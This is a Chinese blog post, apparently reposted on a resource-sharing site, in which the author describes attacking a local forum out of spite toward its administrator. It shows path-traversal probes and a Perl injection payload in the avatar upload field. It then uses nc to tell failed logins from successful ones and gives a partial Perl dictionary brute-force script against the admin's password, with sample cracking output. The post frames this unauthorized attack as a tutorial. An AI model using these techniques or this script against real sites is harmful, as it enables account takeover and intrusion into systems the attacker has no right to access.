也想出现在这里? 联系我们

黑客实战:一次简单脚本攻击实例

作者 : 小编 本文共4363个字,预计阅读时间需要11分钟 发布时间: 2021-06-14 共3.67K人阅读
也想出现在这里? 联系我们

一、开篇

今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。

二、准备/分析

安全第一,先开个HTTP代理,打开社区的登陆页面,看到上面显示的URL是:http://www.****bbs.com/login.cgi

打开页面的源代码,找到登陆的关键几句:

<form action="login.cgi" method="post">

<input type="hidden" name="menu" value="login">

<input type="hidden" name="id" value="">

用户名:<input size="25" name="username" class="i06">

密 码:<input type="password" size="25" value name="userpsd" class="i06">

</form>

所以,提交登陆信息的URL应该是http://wwww.****bbs.com/login.cgi?username=ID&userpsd=PWD&menu=login&id=

习惯先查看用户信息,因为一般情况下用户名和密码都是紧连着保存在一起的,在这里我们更容易接近我们想要的信息。提交如下URL查看silkroad用户信息:

http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad

返回正常用户信息

http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad

同样返回正常用户信息,看来.和/已经被过滤掉了

http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad\\0

提示此用户没有被注册 :(

扫描看看,有FTP弱口令~可惜是anonymous,价值不大。

回到CGI上,只在http://www.****bbs.com/rank.cgi这上面发现用的是Yuzi的BBS3000。下面也可以下载BBS3000分析源代码,但比较费时间,我们先到几处敏感的地方看看,

http://www.****bbs.com/photo.cgi可以上传头像。

由于头像的显示是

<img src=***></img>

关键就在***这里,即图片的连接。在要上传的头像的输入栏中填入

</img>qq~;open F,">the0crat.txt";<img src=>.gif

试试,提交,没有任何提示,程序也没对图片进行任何改变。

换个角度来看,既不分析源代码,也不入侵目标服务器,那么还是来试试探测探测社区管理员的密码,难说我今天运气比较好 :)

当然社区上的管理员也不会是白痴,不会设个空密码等你去玩。提到探测论坛ID的密码,大家首先想到的是什么?下载个又大又没趣的黑客软件来挂个字典?难道就没有点想要自己动手写一个脚本来破密码的冲动?嘿嘿。现在就教你自己动手一步一步来对密码进行探测 :)

密码探测的一般方法是:

①取得预进行猜测的密码列表

|

|

|

②向目标依次提交密码 <———

| |

| |

| |

③根据目标的响应判断密码是否正确 |

| | |

| | |

| | |

密码正确 密码错误 |

| | |

| | |

| | |

返回给用户密码 Next—————–

第三步要绕个圈子,其他的几步用程序就能很简单的实现。

所以先从第三步开始:

我不了解别的那些程序是怎么进行判断的,估计是先取得成功登陆和密码错误的两个页面的代码,然后对比它们的不同点,可能还有别的办法,可我还没想到~~~:)

所以,首先注册个ID,帐号asdfasdf,密码asdfasdf,根据前面取得的信息,此ID提交的URL为http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id=,"username="这后面的是用户ID,"userpsd="这后面是用户密码,然后登出社区

现在用telnet去取得我们想要的信息:

F:\\>nc -vv www.****bbs.com 80 <<<—–用nc连接目标WEB服务的端口,别说你不知道nc是什么,嘿嘿

Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA

www.****bbs.com [***.***.***.***] 80 (http) open

GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1 <Enter>

<<<——-这里用到前面提到的提交用户登陆信息的URL,但用的是错误密码

host:iis-server <Enter><Enter>

HTTP/1.1 200 OK

Date: Mon, 18 Aug 2003 11:59:41 GMT

Server: Apache/1.3.26 (Unix) PHP/4.0.6

Transfer-Encoding: chunked

Content-Type: text/html

fe7 <<<————注意这个

<html>

<head>

<meta http-equiv=Content-Type content=text/html; charset=gb2312>

<link REL="SHORTCUT ICON" href=http://www.****bbs.com/pic/ybb.ico>

……

这个是非成功登陆后返回的信息,再来:

F:\\>nc -vv www.****bbs.com 80

Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA

www.****bbs.com [***.***.***.***] 80 (http) open

GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1

<<<——-这次用的是正确的密码

host:iis-server

HTTP/1.1 200 OK

Date: Mon, 18 Aug 2003 12:09:43 GMT

Server: Apache/1.3.26 (Unix) PHP/4.0.6

Transfer-Encoding: chunked

Content-Type: text/html

18d <<<————注意这个

<html><head><meta http-equiv=Content-Type content=text/html; charset=gb2312>

<SCRIPT>

expireDate=new Date;

expireDate.setYear(expireDate.getYear() 1);

……

这个是成功登陆后返回的信息,返回的信息的第七行"fe7"和"18d"不同,我们就从这里下手。

现在到社区的管理团队上看看管理员的ID,其中一个管理员的ID是“秘密”。

三、程序代码/代码解析

思路(步骤):

取得IP —> 打开字典,字典里每一行一个密码 —> socket() —> connect() —> 向目标主机WEB端口提交数据,此数据中所提交的密码用一个变量来代替,这个变量就是字典里的密码 —> 将返回的信息保存,用先前提到的登陆成功/失败返回信息的不同点进行对比,判断是否登陆成功,即密码是否正确 —> [ 当前密码正确—>输出正确的密码并退出程序; 当前密码错误—>从第二步骤开始重复,直到密码正确或试完字典里的所有密码 ]

#提交的信息

my @res=sendraw($req); #将目标服务器返回的信息保存为数组

if($res[6]=~/fe7/g) #从@res数组中取得所返回信息的第7行,并进行判断。

判断依据:前文中用telnet所获知的用来判断密码是否正确的字符

{print "\\npwd:$pwd error";} #如果返回的信息中的第7行中包含fe7这三个

字符,则在屏幕上打印出密码错误的信息

else

{

print "\\npwd:$pwd passed"; #因为成功登陆后返回的信息中的第7行不包

含fe7这三个字符,所以如果第7行中不包含fe7这三个字符就表示登陆成功,

即密码正确

close(FH);

exit; #探测到正确密码立刻退出

}

} #对比判断是否登陆成功的循环

close(FH);

sub sendraw {

my ($req2) = @_;

my $target;

$target = inet_aton($host) or die "\\ninet_aton problems"; #转换目标IP

socket(Handle,PF_INET,SOCK_STREAM,getprotobyname(’tcp’)||0) or die "\\nSocket problems\\n"; #Socket

if(connect(Handle,pack "SnA4x8",2,80,$target)){ #此例中为80端口,

根据实际情况更改

select(Handle);

$| = 1;

print $req2; #向目标服务器提交登陆资料

my @res2 = <Handle>; #取得目标服务器返回的信息

select(STDOUT);

close(Handle);

return @res2; #将目标服务器返回的信息作为sendraw()函数的返回值

}

else {

die("\\nCan’t connect to $host:80…\\n");

}

}

四、演示

dic.dic内容如下:

asdf

asdfasdf

asdfa

运行这个脚本(win2k activeperl5.6下通过)

C:\\>cracker.pl www.****bbs.com

Sending…

pwd:asdf error

pwd:asdfasdf passed

程序探测到正确密码后退出…:)

注意要根据实际情况更改提交的信息和判断依据,以及WEB端口。

挂个字典,就可以慢慢等密码出来了,然而更多时候是取决于你的运气。

五、总结

弊:这段代码用的是单线程,所以在探测的速度上不是很理想,有兴趣的可以去改改,在没有使用跳板的情况下对自己不安全,而且成功率很大程度上取决于你的运气。

利:这种方法比较有效, 但也是比较没有效率的密码破解方式。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 黑客实战:一次简单脚本攻击实例

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录